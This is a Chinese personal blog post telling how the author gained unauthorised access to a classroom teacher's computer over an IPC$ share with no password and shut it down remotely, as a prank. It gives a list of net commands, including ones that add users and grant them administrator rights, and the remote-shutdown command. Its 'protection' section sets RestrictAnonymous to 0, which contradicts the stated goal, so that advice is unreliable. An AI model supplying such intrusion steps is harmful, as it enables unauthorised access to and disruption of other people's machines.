当前位置:首页 > 默认文章 > 我是如何通过IPC连接关掉老师电脑的

我是如何通过IPC连接关掉老师电脑的

思远2年前 (2021-03-26)默认文章2185

挺久没更新了,今天来更新一篇IPC连接操作,为了这篇文章我差点没嗝屁

首先,IPC连接命令直接贴给你们了


net use ipipc$ user 建立IPC空链接

 

net use ipipc$ 密码 user用户名 建立IPC非空链接

 

net use h ipc$ 密码 user用户名 直接登陆后映射对方C:到本地为H

 

net use h ipc$ 登陆后映射对方C:到本地为H

 

net use ipipc$ del 删除IPC链接

 

net use h del 删除映射对方到本地的为H的映射

 

net user 用户名 密码 add 建立用户

 

net user guest activeyes 激活guest用户

 

net user 查看有哪些用户

 

net user 帐户名 查看帐户的属性

 

net localgroup administrators 用户名 add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数

 

net start 查看开启了哪些服务

 

net start 服务名  开启服务;(如net start telnet, net start schedule)

 

net stop 服务名 停止某服务

 

net time 目标ip 查看对方时间

 

net time 目标ip set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数yes可取消确认信息

 

net view 查看本地局域网内开启了哪些共享

 

net view ip 查看对方局域网内开启了哪些共享

 

net config 显示系统网络设置

 

net logoff 断开连接的共享

 

net pause 服务名 暂停某服务

 

net send ip 文本信息 向对方发信息

 

net ver 局域网内正在使用的网络连接类型和信息

 

net share 查看本地开启的共享

 

net share ipc$ 开启ipc$共享

 

net share ipc$ del 删除ipc$共享

 

net share c$ del 删除C:共享


然后开始我们的行动【滑稽】

我是如何通过IPC连接关掉老师电脑的 系统安全  第1张

因为电脑室电脑有极域电子教室,所以开着ipc,也可以用net share命令来看看


我是如何通过IPC连接关掉老师电脑的 系统安全  第2张


我们可以看到有个IPC的服务,这时候就来

net use \\IP\ipc$ "密码" /user:用户名

(这里面IP代表要连接到的电脑IP,密码 表示要连接到的电脑密码,用户名 表示要连接到的电脑名称

如果不知道电脑名称的话就用net view来看看

我是如何通过IPC连接关掉老师电脑的 系统安全  第3张

我这里就不看了,极域电子教室下都是STU+编号,如STU27

IP的话也有规律,192.168.0.1+编号,如192.168.0.127

密码的话是没有的

那么这就很NICE

连接试试

(此处暂时不贴图)

连接后我们就可以直接远程关机,如命令

shutdown -m \\%ip% -s -t 0

%ip%代表要连接到的电脑IP

然后就妙了,老师一脸懵,同学一阵欢呼



其实IPC连接不仅仅是只有这个功能,可以搞个极域电子教室玩玩,看看里面有什么功能你就会知道IPC有多么的有用我是如何通过IPC连接关掉老师电脑的 系统安全  第4张



防护篇

如何关闭IPC空密码连接呢(电脑没有密码就连接不到你)

粘贴到记事本后缀名改成bat运行

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous" /v "RestrictAnonymous" /d 00000000 /t REG_dword /f

修改注册表策略

还可以关闭139,445端口

同样是bat文件运行

%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",1)(window.close)&&exit
@echo off 
color 1f 
title 关闭135 445 端口
echo. 
echo. 
echo. 
echo 正在关闭135端口 请稍候… 
netsh advfirewall firewall add rule name = "Disable port 135 - TCP" dir = in action = block protocol = TCP localport = 135,137,138,139
echo. 
netsh advfirewall firewall add rule name = "Disable port 135 - UDP" dir = in action = block protocol = UDP localport = 135,137,138,139
echo. 
echo 正在关闭445端口 请稍候… 
netsh advfirewall firewall add rule name = "Disable port 445 - TCP" dir = in action = block protocol = TCP localport = 445
echo. 
netsh advfirewall firewall add rule name = "Disable port 445 - UDP" dir = in action = block protocol = UDP localport = 445
echo.
echo 按任意键退出 
pause>nul

这个时候就可以了

     您阅读本篇文章共花了: 

    扫描二维码推送至手机访问。

    版权声明:本文由勤奋的思远发布,如需转载请注明出处。

    如果文章对你有帮助的话就赞助一下吧https://lsybk.xyz/donation.html

    本文链接:https://lsybk.xyz/post/173.html

    标签: 系统安全
    分享给朋友:

    相关文章

    GoogleHacking常用语法(转载)

    GoogleHacking常用语法(转载)

    1、intext:(仅针对Google有效) 把网页中的正文内容中的某个字符作为搜索的条件2、intitle:把网页标题中的某个字符作为搜索的条件3、cache:搜索搜索引擎里关于某些内容的缓存,可能...

    【教程】bilibili视频下载方法

    【教程】bilibili视频下载方法

    今天脑抽了,想看看关于历史的视频于是.....上B站!!https://www.bilibili.com/video/BV1zW411j7r6 还不错,那看看咋下载。。。搜了一大堆,最后找到这两个网站...

    SQL手注时绕waf的十一种方法

    SQL手注时绕waf的十一种方法

    带大家了解一下SQL时过waf的小方法1.大小写绕过这个大家都很熟悉,对于一些太垃圾的WAF效果显著,比如拦截了union,那就使用Union UnIoN等等绕过。2.简单编码绕过比如WAF检测关键字...

    神奇的burp之注册

    神奇的burp之注册

    这篇文章就来教一下burp的注册与使用burp是什么呢?BurpSuite是一款信息安全从业人员必备的集成型的渗透测试神器,它采用自动测试和半自动测试的方式,包含了Proxy,Spider,Scann...

    论攻防世界CTF题目(1)

    论攻防世界CTF题目(1)

    这回就来看看misc的两道题第一题唔,中间的英文大家看懂了没有,没有的话就翻译,我反正看懂了【滑稽】OK,这就知道什么意思了,那么flag在哪呢?仔细一推,例如后面的不就是了嘛复制,提交,成功第二题,...

    论攻防世界CTF题目(2)

    论攻防世界CTF题目(2)

    上次我们讲了misc的题,今天来讲讲web的题,你们猜今天讲几题?第一题emm,这个感觉跟昨天的F12相似啊,获取在线场景对这种直接f12寻找flagOK,下一题第二题你们知道robots协议是什么吗...

    评论列表

    发表评论

    访客

    看不清,换一张

    ◎欢迎参与讨论,请在这里发表您的看法和观点。